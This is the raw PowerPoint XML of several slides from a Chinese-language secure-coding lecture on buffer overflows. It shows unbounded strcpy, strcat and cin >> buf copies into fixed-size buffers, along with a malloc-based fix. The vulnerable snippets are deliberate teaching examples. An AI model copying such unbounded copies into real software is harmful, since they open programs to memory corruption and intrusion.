              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2.   char name[2048];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>4.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(name, " = ");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>5.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>           ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>6. }</a:t>
            </a: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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1400475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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>简单的解决方案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="2017713"/>
            <a:ext cx="7911480" cy="4507631"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>测试输入字符串的长度然后动态分配内存。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 2.   char *buff = (char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>*)malloc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[1])+1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 3.   if (buff != NULL) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 4.     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 5.     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[1] = %s.\n", buff);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 6.   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 7.   else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>        /* Couldn't get the memory - recover */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 8.   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 9.   return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>10. } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1184048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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>无界字符串复制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>对于下列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>＋＋程序，如果用户输入多于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>个字符，也会导致越界写。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1. #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>iostream.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> main(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3.  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[12];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> &gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>5.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> &lt;&lt; "echo: " &lt;&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> &lt;&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>endl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>6. }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3627080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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
